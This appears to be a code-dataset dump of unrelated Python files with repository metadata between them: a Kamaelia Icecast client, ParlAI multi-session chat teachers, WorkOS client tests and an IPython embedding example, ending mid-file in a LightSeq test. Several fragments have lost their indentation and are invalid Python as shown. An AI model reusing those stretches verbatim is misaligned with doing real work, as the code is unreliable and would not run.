elif isinstance(msg, ParsedHTTPBodyChunk):
readbuffer += msg.bodychunk
elif isinstance(msg, ParsedHTTPEnd):
self.send(IceIPCDisconnected(), "outbox")
while len(readbuffer) > 0:
if metadatainterval == 0: #if no metadata
self.send(IceIPCDataChunk(readbuffer), "outbox")
readbuffer = ""
else:
chunkdata = readbuffer[0:bytesUntilMetadata]
if len(chunkdata) > 0:
self.send(IceIPCDataChunk(chunkdata), "outbox")
readbuffer = readbuffer[bytesUntilMetadata:]
bytesUntilMetadata -= len(chunkdata)
if len(readbuffer) > 0: #we must have some metadata (perhaps only partially complete) at the start
metadatalength = ord(readbuffer[0]) * 16 # they encode it as bytes / 16
if len(readbuffer) >= metadatalength + 1: # +1 for the length byte we just read. if we have all the metadata chunk
metadata = self.dictizeMetadata(readbuffer[1:metadatalength + 1])
self.send(IceIPCMetadata(metadata), "outbox")
bytesUntilMetadata = metadatainterval
readbuffer = readbuffer[metadatalength + 1:]
else:
break #we need more data before we can do anything
while self.dataReady("control"):
msg = self.recv("control")
if isinstance(msg, producerFinished) or isinstance(msg, shutdown):
return
self.pause()
class IcecastClient(SingleShotHTTPClient):
"""\
IcecastClient(starturl) -> Icecast/SHOUTcast MP3 streaming component
Arguments:
- starturl -- the URL of the stream
"""
def formRequest(self, url):
"""Overrides the standard HTTP request with an Icecast/SHOUTcast variant
which includes the icy-metadata header required to get metadata with the
stream"""
self.send("IcecastClient.formRequest()", "debug")
splituri = splitUri(url)
host = splituri["uri-server"]
if splituri.has_key("uri-port"):
host += ":" + splituri["uri-port"]
splituri["request"] = "GET " + splituri["raw-uri"] + " HTTP/1.1\r\n"
splituri["request"] += "Host: " + host + "\r\n"
splituri["request"] += "User-agent: Kamaelia Icecast Client 0.3 (RJL)\r\n"
splituri["request"] += "Connection: Keep-Alive\r\n"
splituri["request"] += "icy-metadata: 1\r\n"
splituri["request"] += "\r\n"
return splituri
def main(self):
while 1: #keep reconnecting
self.requestqueue.append(HTTPRequest(self.formRequest(self.starturl), 0))
while self.mainBody():
yield 1
class IcecastStreamRemoveMetadata(component):
def main(self):
while 1:
yield 1
while self.dataReady("inbox"):
msg = self.recv("inbox")
if isinstance(msg, IceIPCDataChunk):
self.send(msg.data, "outbox")
self.pause()
class IcecastStreamWriter(component):
Inboxes = {
"inbox" : "Icecast stream",
"control" : "UNUSED"
}
Outboxes = {
"outbox" : "UNUSED",
"signal" : "UNUSED"
}
def __init__(self, filename):
super(IcecastStreamWriter, self).__init__()
self.filename = filename
def main(self):
f = open(self.filename, "wb")
while 1:
yield 1
while self.dataReady("inbox"):
msg = self.recv("inbox")
if isinstance(msg, IceIPCDataChunk):
f.write(msg.data)
self.pause()
if __name__ == '__main__':
from Kamaelia.Util.PipelineComponent import pipeline
pipeline(
IcecastClient("http://64.236.34.97:80/stream/1049"),
IcecastDemux(),
IcecastStreamWriter("stream.mp3"),
).run()
| 35.202479 | 138 | 0.570959 |
0533cd3c4e8dbeae09e721a2a69d1a05cd17fede | 24,975 | py | Python | parlai/tasks/msc/agents.py | skywalker023/ParlAI | 70ee4a2c63008774fc9e66a8392847554920a14d | [
"MIT"
] | null | null | null | parlai/tasks/msc/agents.py | skywalker023/ParlAI | 70ee4a2c63008774fc9e66a8392847554920a14d | [
"MIT"
] | 2 | 2022-01-13T03:54:49.000Z | 2022-03-12T01:00:29.000Z | parlai/tasks/msc/agents.py | skywalker023/ParlAI | 70ee4a2c63008774fc9e66a8392847554920a14d | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from parlai.core.teachers import DialogTeacher
from parlai.utils.io import PathManager
from parlai.core.opt import Opt
from parlai.utils.strings import normalize_reply
from parlai.core.teachers import MultiTaskTeacher
from .build import build
import os
import json
from typing import Optional
from parlai.core.params import ParlaiParser
import copy
import random
import math
from parlai.utils.logging import logger
from parlai.core.message import Message
from parlai.tasks.convai2.agents import NormalizedTeacherTrait, SelfOriginalTeacher
# Sentinel label used when a dialogue turn reveals no new persona information
# (such turns are subsampled in the persona-summary teacher).
NOPERSONA = '__NO__PERSONA__BEAM__MIN__LEN__20__'
# Placeholder utterance inserted to pad/align dialogue turns so that speaker
# parity is preserved when sessions are concatenated.
DUMMY_TEXT = '__SILENCE__'
def get_sessionbase_dir_path(opt, dpath, task_name):
    """
    Build the per-session data directory for one of the MSC sub-tasks.

    :param opt: options dict; ``session_id`` selects the session (defaults to 0).
    :param dpath: root data directory.
    :param task_name: one of ``msc_personasummary`` or ``msc_dialogue``.
    :return: path of the form ``<dpath>/msc/<task_name>/session_<id>``.
    """
    assert task_name in ('msc_personasummary', 'msc_dialogue')
    session_folder = 'session_{}'.format(opt.get("session_id", 0))
    return os.path.join(dpath, 'msc', task_name, session_folder)
def get_predicted_summary_path(dpath, is_session_level=True):
    """
    Locate the cached file of model-predicted persona summaries.

    :param dpath: root data directory.
    :param is_session_level: when True, return the session-level summaries
        file; otherwise the per-utterance summaries file.
    :return: full path to the JSON summary file under ``msc/msc_dialogue``.
    """
    if is_session_level:
        fname = 'sessionlevel_summaries_subsample5.json'
    else:
        fname = 'summaries_subsample5.json'
    return os.path.join(dpath, 'msc', 'msc_dialogue', fname)
class SessionBasePersonaSummaryTeacher(DialogTeacher):
    """
    Teacher that summarizes the persona lines.

    Each example's text is a window of dialogue turns and the label is the
    persona line attached to the final turn of that window, or the
    ``NOPERSONA`` sentinel when that turn reveals no persona (such negative
    examples are subsampled by ``--nopersona-subsampling-weight``).
    """

    @classmethod
    def add_cmdline_args(
        cls, parser: ParlaiParser, partial_opt: Optional[Opt] = None
    ) -> ParlaiParser:
        """
        Add command-line arguments specific to the persona-summary teacher.
        """
        super().add_cmdline_args(parser, partial_opt)
        agent = parser.add_argument_group('MSC Persona Summary Teacher options')
        agent.add_argument('--session-id', type=int, default=1, help="session id")
        agent.add_argument(
            '--summary-num-turns',
            type=int,
            default=-1,
            help="number of turns to infer persona",
        )
        agent.add_argument(
            '--nopersona-subsampling-weight',
            type=float,
            default=1,
            # fixed typo in help text ("subampling" -> "subsampling")
            help="subsampling ratio",
        )
        return parser

    def __init__(self, opt, shared=None):
        self.summary_num_turns = opt['summary_num_turns']
        # An odd window would start/end on the same speaker; require even
        # (or negative, meaning "use the whole history").
        assert (
            self.summary_num_turns < 0 or self.summary_num_turns % 2 == 0
        ), "Please choose an even number for turns"
        self.session_id = opt['session_id']
        # fixed typo in assertion messages ("beyong" -> "beyond")
        assert opt['session_id'] <= 4, f"No data beyond session {opt['session_id']}!"
        assert (
            opt['session_id'] <= 3 or 'train' not in opt['datatype']
        ), f"No train data beyond session {opt['session_id']}!"
        self.nopersona_subsampling_weight = opt['nopersona_subsampling_weight']
        if 'test' in opt['datatype']:
            # Never subsample on the test split so evaluation is complete.
            logger.warning(f'WARNING: Not subsampling for {opt["datatype"]}')
            self.nopersona_subsampling_weight = 1
        assert (
            self.nopersona_subsampling_weight >= 0
            and self.nopersona_subsampling_weight <= 1
        ), "invalid subsampling weight"
        dpath = build(opt)
        opt['datafile'] = get_sessionbase_dir_path(opt, dpath, 'msc_personasummary')
        self.id = f'msc_personasummary_{self.session_id}'
        super().__init__(opt, shared)

    def setup_data(self, data_path):
        """
        Yield one summarization example per dialogue turn.

        Reads the split's ``.txt`` file of JSON lines, builds a sliding
        window of turns ending at each index, subsamples the no-persona
        examples, shuffles, and yields each example as a new episode.

        :param data_path: session directory containing train/valid/test files.
        """
        print('loading: ' + data_path)
        if self.datatype.startswith('train'):
            path_to_open = os.path.join(data_path, 'train.txt')
        elif self.datatype.startswith('valid'):
            path_to_open = os.path.join(data_path, 'valid.txt')
        else:
            path_to_open = os.path.join(data_path, 'test.txt')

        with PathManager.open(path_to_open) as f:
            raw_data = [json.loads(line.strip()) for line in f]

        data = []
        negative_data = []
        for dialog_dict in raw_data:
            current_episode = dialog_dict['dialog']
            init_personachat = dialog_dict['init_personachat']
            for end_idx in range(len(current_episode)):
                # Window covers the last `summary_num_turns` turns ending at
                # end_idx; a non-positive setting means the full history.
                if self.summary_num_turns > 0:
                    start_index = max(0, end_idx - self.summary_num_turns + 1)
                else:
                    start_index = 0
                end_line_persona = (
                    current_episode[end_idx]['persona_text']
                    if 'persona_text' in current_episode[end_idx]
                    else NOPERSONA
                )
                dialog_texts = [
                    current_episode[i]['text'] for i in range(start_index, end_idx + 1)
                ]
                action = {
                    'id': self.id,
                    'text': '\n'.join(dialog_texts),
                    'labels': [end_line_persona],
                    'initial_data_id': dialog_dict['initial_data_id'],
                    'init_personas': init_personachat['init_personas'],
                    'utt_idx': end_idx,
                    # speakers alternate by turn parity: 1-based speaker index
                    'speaker_idx': end_idx % 2 + 1,
                    'session_id': self.session_id,
                }
                if end_line_persona == NOPERSONA:
                    negative_data.append(action)
                else:
                    data.append(action)

        # Keep only a weighted fraction of the no-persona examples.
        size_to_sample = math.ceil(
            self.nopersona_subsampling_weight * len(negative_data)
        )
        data.extend(random.sample(negative_data, size_to_sample))
        random.shuffle(data)

        for episode in data:
            # Each example is its own (single-turn) episode.
            yield Message(episode), True
class SessionBaseMscTeacher(DialogTeacher):
    """
    Teacher that generates the next utterance in a multi-session chat.

    Context can optionally include persona summaries (gold, predicted, or
    the original grounding lines) and/or the raw history of previous
    sessions, configured via the command-line options below.
    """
    @classmethod
    def add_cmdline_args(
        cls, parser: ParlaiParser, partial_opt: Optional[Opt] = None
    ) -> ParlaiParser:
        """
        Add command-line arguments controlling session selection, persona
        context type, speaker roles, and history formatting.
        """
        super().add_cmdline_args(parser, partial_opt)
        agent = parser.add_argument_group('Multi-Session Chat Task options')
        agent.add_argument(
            '--session-id',
            type=int,
            default=2,
            help="session id, session_id = 1 refers to convai2 teacher and it's not supported here",
        )
        # What form of previous-session context to prepend; see `help` below
        # for the meaning of each prefix.
        agent.add_argument(
            '--previous-persona-type',
            type=str,
            default="raw_history",
            choices=[
                'none',
                'goldsum_self',
                'goldsum_both',
                'goldsum_their',
                'predsum_self',
                'predsum_both',
                'predsum_their',
                'predsum_utt_self',
                'predsum_utt_both',
                'predsum_utt_their',
                'init_self',
                'init_both',
                'init_their',
                'raw_history',
            ],
            help="type of previous context to include as context. "
            "the 'goldsum_' prefix refers to gold persona summaries from crowdworkers; "
            "the 'predsum_' prefix refers to predicted persona summaries from a summarization model; "
            "the 'init_' prefix refers to the original persona lines used to ground the PersonaChat conversations. ",
        )
        # NOTE(review): `type=bool` on the three flags below means argparse
        # treats any non-empty string as True (e.g. "--your-persona-first
        # False" parses as True); confirm whether ParlaiParser special-cases
        # bool before relying on passing these from the command line.
        agent.add_argument(
            '--your-persona-first',
            type=bool,
            default=False,
            help="whether to prepend your persona first or not",
        )
        agent.add_argument(
            '--session-openning',
            type=bool,
            default=False,
            help="whether to only include session opening or not",
        )
        agent.add_argument(
            '--label-speaker-id',
            type=str,
            default="both",
            choices=['self', 'both', 'their'],
            help="the speaker id of the 'labels' field,",
        )
        agent.add_argument(
            '--include-time-gap',
            type=bool,
            default=False,
            help="whether to include time passed since last conversation in the context",
        )
        agent.add_argument(
            '--history-time-gaps-token',
            type=str,
            default=None,
            help="time tokens in the previous raw dialogue history, e.g. 'time:' ",
        )
        agent.add_argument(
            '--history-person-tokens',
            type=str,
            default=None,
            help="person tokens in the previous raw dialogue history, e.g. 'p1:,p2:' ",
        )
        agent.add_argument(
            '--previous-session-delimiter',
            type=str,
            default=None,
            help="delimiter between previous sessions in the context, such as '__NEXT_SESSION__' ",
        )
        return parser
def __init__(self, opt, shared=None):
assert opt['session_id'] <= 5, f"No data beyong session {opt['session_id']}!"
assert (
opt['session_id'] <= 4 or 'train' not in opt['datatype']
), f"No train data beyong session {opt['session_id']}!"
assert (
not opt['previous_persona_type'].startswith('predsum')
or opt['session_id'] <= 4
or (
opt['session_id'] == 5
and ('valid' in opt['datatype'] or 'test' in opt['datatype'])
)
), f"No predicted summary for session {opt['session_id']}"
self.previous_persona_type = opt['previous_persona_type']
self.session_openning = opt.get('session_openning', False)
if self.session_openning:
opt['label_speaker_id'] = 'their'
# NOTE: session_id = 1: personachat
self.session_id = opt['session_id']
self.label_speaker_id = opt["label_speaker_id"]
self.your_persona_first = opt['your_persona_first']
self.include_last_time_gap = opt['include_time_gap']
self.history_time_gaps_token = opt['history_time_gaps_token']
if self.history_time_gaps_token:
self.include_last_time_gap = False
self.history_person_tokens = opt['history_person_tokens']
self.use_predicted_summary = self.previous_persona_type.startswith('predsum')
self.previous_session_delimiter = opt.get('previous_session_delimiter', None)
if self.history_person_tokens is not None:
self.history_person_tokens = self.history_person_tokens.split(",")
self.msc_dpath = build(opt)
opt['datafile'] = get_sessionbase_dir_path(opt, self.msc_dpath, 'msc_dialogue')
self.id = f'msc_dialogue_{self.session_id}'
super().__init__(opt, shared)
def normalize_replies(self, x):
xs = [xt.strip() for xt in x.split('\n')]
xs2 = []
for x in xs:
if 'your persona:' in x:
# Normalize the sentence appearing after 'your persona:'
x = x[len('your persona: ') :]
x = normalize_reply(x)
x = 'your persona: ' + x
elif "partner's persona: " in x:
x = x[len("partner's persona: ") :]
x = normalize_reply(x)
x = "partner's persona: " + x
elif x != DUMMY_TEXT:
x = normalize_reply(x)
xs2.append(x)
return "\n".join(xs2)
    def setup_data(self, datafile):
        """
        Load one MSC dialogue split and yield ``(message_dict, new_episode)`` pairs.

        Each line of the raw file is a json conversation. Depending on the
        teacher options, the first turn of every episode is prefixed with a
        persona/context string: gold or predicted persona summaries, or the raw
        text of the previous sessions' dialogues.
        """
        print('loading: ' + datafile)
        # Select the file matching the current datatype split.
        if self.datatype.startswith('train'):
            path_to_open = os.path.join(datafile, 'train.txt')
        elif self.datatype.startswith('valid'):
            path_to_open = os.path.join(datafile, 'valid.txt')
        else:
            path_to_open = os.path.join(datafile, 'test.txt')
        with PathManager.open(path_to_open) as f:
            raw_data = [json.loads(line.strip()) for line in f]
        data = []
        label_speaker_id_range = {}
        predicted_summary_dict = {}
        if self.use_predicted_summary:
            # Predicted summaries replace the gold personas; they are keyed by
            # session id, then by the conversation's initial_data_id.
            is_session_level = not ('utt_' in self.previous_persona_type)
            predsum_path = get_predicted_summary_path(self.msc_dpath, is_session_level)
            logger.warning(f"use the predicted summary from {predsum_path}")
            with PathManager.open(predsum_path) as jsonfile:
                predicted_summary_dict = json.load(jsonfile)
        def _get_time_gap(time_num, time_unit, time_token=""):
            # Render e.g. "3 hours", optionally prefixed with a time token.
            time_gap = str(time_num) + ' ' + time_unit
            return f'{time_token} {time_gap}' if len(time_token) > 0 else time_gap
        def _compile_persona_dialog_input(
            dialog, personas, previous_dialogs, label_speaker_id
        ):
            # Build prefixed persona strings for the chosen label speaker and
            # pad dialogs with DUMMY_TEXT so turns align into (text, label) pairs.
            new_dialog = copy.deepcopy(dialog)
            new_previous_dialogs = copy.deepcopy(previous_dialogs)
            your_persona = ""
            partner_persona = ""
            if label_speaker_id == 'self':
                your_persona = '\n'.join([f'your persona: {x}' for x in personas[1]])
                partner_persona = '\n'.join(
                    [f"partner's persona: {x}" for x in personas[0]]
                )
            elif label_speaker_id == 'their':
                your_persona = '\n'.join([f'your persona: {x}' for x in personas[0]])
                partner_persona = '\n'.join(
                    [f"partner's persona: {x}" for x in personas[1]]
                )
            for prev_dialog in new_previous_dialogs:
                prev_dialog['dialog'].insert(0, {"text": DUMMY_TEXT})
                if len(prev_dialog['dialog']) % 2 == 1 and (
                    self.history_person_tokens is None
                ):
                    prev_dialog['dialog'].append({"text": DUMMY_TEXT})
            new_dialog.insert(0, {"text": DUMMY_TEXT})
            return your_persona, partner_persona, new_dialog, new_previous_dialogs
        for dialog_dict in raw_data:
            initial_data_id = dialog_dict['metadata']['initial_data_id']
            # 'both' produces two episodes per conversation, one per speaker.
            if self.label_speaker_id == 'both':
                label_speaker_id_range = ['their', 'self']
            else:
                label_speaker_id_range = [self.label_speaker_id]
            for label_speaker_id in label_speaker_id_range:
                # Choose which persona source to compile into the context.
                if self.use_predicted_summary:
                    personas_to_complie = predicted_summary_dict[
                        str(self.session_id - 1)
                    ][initial_data_id]
                elif self.previous_persona_type.startswith('init'):
                    personas_to_complie = dialog_dict['init_personas']
                else:
                    personas_to_complie = dialog_dict['personas']
                (
                    your_persona,
                    partner_persona,
                    new_dialog,
                    new_previous_dialogs,
                ) = _compile_persona_dialog_input(
                    dialog_dict['dialog'],
                    personas_to_complie,
                    dialog_dict['previous_dialogs'],
                    label_speaker_id,
                )
                previous_sessions_msgs = []
                if self.previous_persona_type == 'raw_history':
                    # Flatten each previous session into a single newline-joined
                    # string, optionally tagging speakers and time gaps.
                    for d_id in range(len(new_previous_dialogs)):
                        previous_dialog_msg = [
                            x['text'] for x in new_previous_dialogs[d_id]['dialog']
                        ]
                        if self.history_person_tokens:
                            previous_dialog_msg = [
                                self.history_person_tokens[i % 2] + ' ' + text
                                for i, text in enumerate(previous_dialog_msg)
                                if text != DUMMY_TEXT
                            ]
                        if self.history_time_gaps_token:
                            time_gap_i = _get_time_gap(
                                new_previous_dialogs[d_id]['time_num'],
                                new_previous_dialogs[d_id]['time_unit'],
                                time_token=self.history_time_gaps_token,
                            )
                            previous_sessions_msgs.append(
                                '\n'.join(previous_dialog_msg + [time_gap_i])
                            )
                        else:
                            previous_sessions_msgs.append(
                                '\n'.join(previous_dialog_msg)
                            )
                if self.previous_session_delimiter is not None:
                    # Interleave a delimiter token after each session's text.
                    previous_sessions_msgs = [
                        val
                        for pair in zip(
                            previous_sessions_msgs,
                            [self.previous_session_delimiter]
                            * len(previous_sessions_msgs),
                        )
                        for val in pair
                    ]
                previous_sessions_msgs = '\n'.join(previous_sessions_msgs)
                episode = []
                # Pair up turns: even index is context text, odd index is label.
                for i in range(0, len(new_dialog) - 1, 2):
                    text = new_dialog[i]['text']
                    partner_persona_one_line = partner_persona.replace('\n', '').split(
                        "partner's persona: "
                    )
                    your_persona_one_line = your_persona.replace('\n', '').split(
                        "your persona: "
                    )
                    action = {
                        'id': self.id,
                        'text': self.normalize_replies(text),
                        'labels': [self.normalize_replies(new_dialog[i + 1]['text'])],
                        'session_id': self.session_id,
                        'initial_data_id': initial_data_id,
                        'personas': f'{partner_persona}\n{your_persona}',
                        'personas_one_line': f"partner's persona: {' '.join(partner_persona_one_line)}\nyour persona: {' '.join(your_persona_one_line)}",
                    }
                    episode.append(action)
                    # Session-opening mode keeps only the first exchange.
                    if self.session_openning:
                        break
                # Assemble the context string prepended to the first turn.
                persona_context_str = ""
                if 'self' in self.previous_persona_type:
                    persona_context_str = your_persona
                elif 'their' in self.previous_persona_type:
                    persona_context_str = partner_persona
                elif 'both' in self.previous_persona_type:
                    if self.your_persona_first:
                        persona_context_str = (
                            (your_persona + '\n') if len(your_persona) > 0 else ""
                        ) + partner_persona
                    else:
                        persona_context_str = (
                            (partner_persona + '\n') if len(partner_persona) > 0 else ""
                        ) + your_persona
                elif self.previous_persona_type == 'raw_history':
                    persona_context_str = previous_sessions_msgs
                if self.include_last_time_gap:
                    # Append the gap since the most recent previous session.
                    time_gap = _get_time_gap(
                        dialog_dict['previous_dialogs'][-1]['time_num'],
                        dialog_dict['previous_dialogs'][-1]['time_unit'],
                    )
                    persona_context_str = (
                        (persona_context_str + '\n')
                        if len(persona_context_str) > 0
                        else ""
                    ) + f'[{time_gap}]'
                if persona_context_str and len(persona_context_str) > 0:
                    episode[0]['text'] = persona_context_str + '\n' + episode[0]['text']
                data.append(episode)
        for episode in data:
            start_idx = 0
            # The second yielded element flags the start of a new episode.
            for i, turn in enumerate(episode):
                yield Message(turn), i == start_idx
class PersonaSummaryTeacher(MultiTaskTeacher):
    """
    Multi-session persona summary teacher combining the per-session summary tasks.
    """

    @classmethod
    def add_cmdline_args(
        cls, parser: ParlaiParser, partial_opt: Optional[Opt] = None
    ) -> ParlaiParser:
        super().add_cmdline_args(parser, partial_opt)
        group = parser.add_argument_group('MSC Summary Teacher Args')
        group.add_argument(
            '--include-last-session',
            type=bool,
            default=False,
            help="whether to include session 4 for valid and test splits",
        )
        SessionBasePersonaSummaryTeacher.add_cmdline_args(group, partial_opt)
        return group

    def __init__(self, opt, shared=None):
        session_ids = [1, 2, 3]
        # Session 4 summaries are only available outside the train split.
        if opt.get('include_last_session', False) and 'train' not in opt['datatype']:
            session_ids.append(4)
        opt = copy.deepcopy(opt)
        opt['task'] = ','.join(
            f'msc:SessionBasePersonaSummary:session_id={sid}' for sid in session_ids
        )
        super().__init__(opt, shared)
class Session1NormalizedTrait(NormalizedTeacherTrait):
    """
    Trait that optionally flattens each speaker's persona lines into one line.
    """

    @classmethod
    def add_cmdline_args(
        cls, parser: ParlaiParser, partial_opt: Optional[Opt] = None
    ) -> ParlaiParser:
        super().add_cmdline_args(parser, partial_opt)
        agent = parser.add_argument_group('Session Level NormalizedTeacher arguments')
        agent.add_argument(
            '--is-convai2-session-level',
            type=bool,
            default=False,
            help="whether to flatten the persona lines into a single persona line per speaker",
        )
        return agent

    def __init__(self, opt, shared=None):
        self.is_convai2_session_level = opt.get('is_convai2_session_level', False)
        super().__init__(opt, shared)

    def normalize_replies(self, x):
        """Normalize each line of *x*, grouping persona lines by speaker."""
        your_prefix = 'your persona: '
        partner_prefix = "partner's persona: "
        your_personas = []
        partner_personas = []
        non_personas = []
        for line in x.split('\n'):
            if line.startswith(your_prefix):
                # Normalize only the sentence after the prefix.
                your_personas.append(normalize_reply(line[len(your_prefix):]))
            elif line.startswith(partner_prefix):
                partner_personas.append(normalize_reply(line[len(partner_prefix):]))
            else:
                non_personas.append(normalize_reply(line))
        if self.is_convai2_session_level:
            # Collapse each speaker's persona sentences into one prefixed line.
            if your_personas:
                your_personas = [your_prefix + ' '.join(your_personas)]
            if partner_personas:
                partner_personas = [partner_prefix + ' '.join(partner_personas)]
        else:
            your_personas = [your_prefix + sent for sent in your_personas]
            partner_personas = [partner_prefix + sent for sent in partner_personas]
        if self.your_persona_first:
            ordered = your_personas + partner_personas
        else:
            ordered = partner_personas + your_personas
        return '\n'.join(ordered + non_personas)
class Session1SelfTeacher(Session1NormalizedTrait, SelfOriginalTeacher):
    """
    Convai2 as Session 1.

    Reuses the ConvAI2 'self' teacher, mixed in with Session1NormalizedTrait so
    persona lines can optionally be flattened to one line per speaker.
    """
    pass
class MscTeacher(MultiTaskTeacher):
    """
    Multi-session chat teacher combining session 1 (ConvAI2) with MSC sessions
    2-4, and optionally session 5.
    """

    @classmethod
    def add_cmdline_args(
        cls, parser: ParlaiParser, partial_opt: Optional[Opt] = None
    ) -> ParlaiParser:
        super().add_cmdline_args(parser, partial_opt)
        group = parser.add_argument_group('Multi Session Chat (MSC) Teacher Args')
        group.add_argument(
            '--include-session1',
            type=bool,
            default=True,
            help="whether to include session 1 (convai2:normalized)",
        )
        group.add_argument(
            '--include-last-session',
            type=bool,
            default=False,
            help="whether to include session 5",
        )
        SessionBaseMscTeacher.add_cmdline_args(group, partial_opt)
        Session1SelfTeacher.add_cmdline_args(group, partial_opt)
        return group

    def __init__(self, opt, shared=None):
        msc_tasks = [f'msc:SessionBaseMsc:session_id={sid}' for sid in (2, 3, 4)]
        # Session-opening mode never includes session 1.
        if opt.get('include_session1', False) and not opt['session_openning']:
            # Predicted-summary persona types use session-level flattening.
            session_level = opt['previous_persona_type'] in (
                'predsum_self',
                'predsum_both',
                'predsum_their',
            )
            msc_tasks.insert(
                0, f'msc:Session1Self:is_convai2_session_level={session_level}'
            )
        # Session 5 is only available outside the train split.
        if opt.get('include_last_session', False) and 'train' not in opt['datatype']:
            msc_tasks.append('msc:SessionBaseMsc:session_id=5')
        opt = copy.deepcopy(opt)
        opt['task'] = ','.join(msc_tasks)
        super().__init__(opt, shared)
class DefaultTeacher(MscTeacher):
    """Default teacher for the `msc` task; alias of MscTeacher."""
    pass
| 40.347334 | 153 | 0.552312 |
601099085405113a5b4a6c114a5a5d070e63e06f | 2,790 | py | Python | tests/test_client.py | ihorizonUK/workos-python | 80ec96d9c4ed3f2539946a19ad9c9b59ac6ee023 | [
"MIT"
] | 13 | 2020-03-18T20:38:32.000Z | 2022-03-02T20:23:42.000Z | tests/test_client.py | ihorizonUK/workos-python | 80ec96d9c4ed3f2539946a19ad9c9b59ac6ee023 | [
"MIT"
] | 71 | 2020-02-27T03:53:40.000Z | 2022-03-11T16:54:14.000Z | tests/test_client.py | ihorizonUK/workos-python | 80ec96d9c4ed3f2539946a19ad9c9b59ac6ee023 | [
"MIT"
] | 5 | 2020-10-29T22:38:41.000Z | 2022-02-20T21:12:58.000Z | import pytest
from workos import client
from workos.exceptions import ConfigurationException
class TestClient(object):
    """Tests for lazy initialization of the top-level WorkOS client bindings."""

    @pytest.fixture(autouse=True)
    def setup(self):
        # Drop every cached API binding so each test starts from a clean client.
        client._audit_trail = None
        client._directory_sync = None
        client._organizations = None
        client._passwordless = None
        client._portal = None
        client._sso = None

    def test_initialize_sso(self, set_api_key_and_client_id):
        assert client.sso

    def test_initialize_audit_log(self, set_api_key):
        assert client.audit_trail

    def test_initialize_directory_sync(self, set_api_key):
        assert client.directory_sync

    def test_initialize_organizations(self, set_api_key):
        assert client.organizations

    def test_initialize_passwordless(self, set_api_key):
        assert client.passwordless

    def test_initialize_portal(self, set_api_key):
        assert client.portal

    def test_initialize_sso_missing_api_key(self, set_client_id):
        with pytest.raises(ConfigurationException) as ex:
            client.sso
        err_text = str(ex)
        assert "api_key" in err_text
        assert "client_id" not in err_text

    def test_initialize_sso_missing_client_id(self, set_api_key):
        with pytest.raises(ConfigurationException) as ex:
            client.sso
        err_text = str(ex)
        assert "client_id" in err_text
        assert "api_key" not in err_text

    def test_initialize_sso_missing_api_key_and_client_id(self):
        with pytest.raises(ConfigurationException) as ex:
            client.sso
        err_text = str(ex)
        for setting in ("api_key", "client_id"):
            assert setting in err_text

    def test_initialize_audit_trail_missing_api_key(self):
        with pytest.raises(ConfigurationException) as ex:
            client.audit_trail
        assert "api_key" in str(ex)

    def test_initialize_directory_sync_missing_api_key(self):
        with pytest.raises(ConfigurationException) as ex:
            client.directory_sync
        assert "api_key" in str(ex)

    def test_initialize_organizations_missing_api_key(self):
        with pytest.raises(ConfigurationException) as ex:
            client.organizations
        assert "api_key" in str(ex)

    def test_initialize_passwordless_missing_api_key(self):
        with pytest.raises(ConfigurationException) as ex:
            client.passwordless
        assert "api_key" in str(ex)

    def test_initialize_portal_missing_api_key(self):
        with pytest.raises(ConfigurationException) as ex:
            client.portal
        assert "api_key" in str(ex)
4b2e7358aad0ca0f81d0bcd5fbe78cf73b54a6e2 | 1,927 | py | Python | build/env/lib/python2.7/site-packages/ipython-0.10-py2.7.egg/share/doc/ipython/examples/core/example-embed-short.py | lumanjiao/XLS_BigData | 2c4c37872b8636df1c8b0e005bc12a635a753c7a | [
"Apache-2.0"
] | 11 | 2019-03-20T07:38:35.000Z | 2021-06-18T09:42:46.000Z | docs/examples/core/example-embed-short.py | 08saikiranreddy/ipython | 3498382180ad409592f46a9dd0d190ca917bfbff | [
"BSD-3-Clause-Clear"
] | 1 | 2015-07-16T22:26:53.000Z | 2015-07-16T22:26:53.000Z | docs/examples/core/example-embed-short.py | 08saikiranreddy/ipython | 3498382180ad409592f46a9dd0d190ca917bfbff | [
"BSD-3-Clause-Clear"
] | 5 | 2019-06-29T03:13:02.000Z | 2020-04-23T04:47:11.000Z | """Quick code snippets for embedding IPython into other programs.
See example-embed.py for full details, this file has the bare minimum code for
cut and paste use once you understand how to use the system."""
#---------------------------------------------------------------------------
# Snippet 1: load IPython, but adjust a few settings when this code detects
# that it is already running embedded in another IPython session (helps
# avoid confusion about which interpreter is active).
try:
    __IPYTHON__
except NameError:
    argv = ['']
    banner = exit_msg = ''
else:
    # Command-line options for IPython (a list shaped like sys.argv).
    argv = ['-pi1','In <\\#>:','-pi2',' .\\D.:','-po','Out<\\#>:']
    banner = '*** Nested interpreter ***'
    exit_msg = '*** Back in main IPython ***'
# First import the embeddable shell class.
from IPython.Shell import IPShellEmbed
# Now create the IPython shell instance. Put ipshell() anywhere in your code
# where you want it to open.
ipshell = IPShellEmbed(argv,banner=banner,exit_msg=exit_msg)
#---------------------------------------------------------------------------
# Snippet 2: always load an embeddable IPython shell, with no special
# handling for nested embeddings.
from IPython.Shell import IPShellEmbed
ipshell = IPShellEmbed()
# Now ipshell() will open IPython anywhere in the code.
#---------------------------------------------------------------------------
# Snippet 3: load an embeddable shell only if NOT already running inside
# IPython. Inside IPython, the embeddable shell variable ipshell is just a
# dummy function.
try:
    __IPYTHON__
except NameError:
    from IPython.Shell import IPShellEmbed
    ipshell = IPShellEmbed()
    # Now ipshell() will open IPython anywhere in the code.
else:
    # Define a dummy ipshell() so the same code doesn't crash inside an
    # interactive IPython.
    def ipshell(): pass
#******************* End of file <example-embed-short.py> ********************
baa00a3c2a658318940fc026e380e597ed431470 | 3,625 | py | Python | examples/inference/python/test/ls_bert.py | hexisyztem/lightseq | 25265dabaaee42ee9e7b7ec43c8c04fb90292733 | [
"Apache-2.0"
] | 106 | 2019-12-06T09:02:58.000Z | 2020-09-09T07:12:21.000Z | examples/inference/python/test/ls_bert.py | hexisyztem/lightseq | 25265dabaaee42ee9e7b7ec43c8c04fb90292733 | [
"Apache-2.0"
] | null | null | null | examples/inference/python/test/ls_bert.py | hexisyztem/lightseq | 25265dabaaee42ee9e7b7ec43c8c04fb90292733 | [
"Apache-2.0"
] | 15 | 2019-12-09T05:44:28.000Z | 2020-09-04T03:43:56.000Z | import time
import argparse
import torch
import lightseq.inference as lsi
from transformers import BertTokenizer, BertForSequenceClassification
def ls_bert(model, inputs, attn_mask):
    """Run LightSeq inference once and return (output, wall-clock seconds)."""
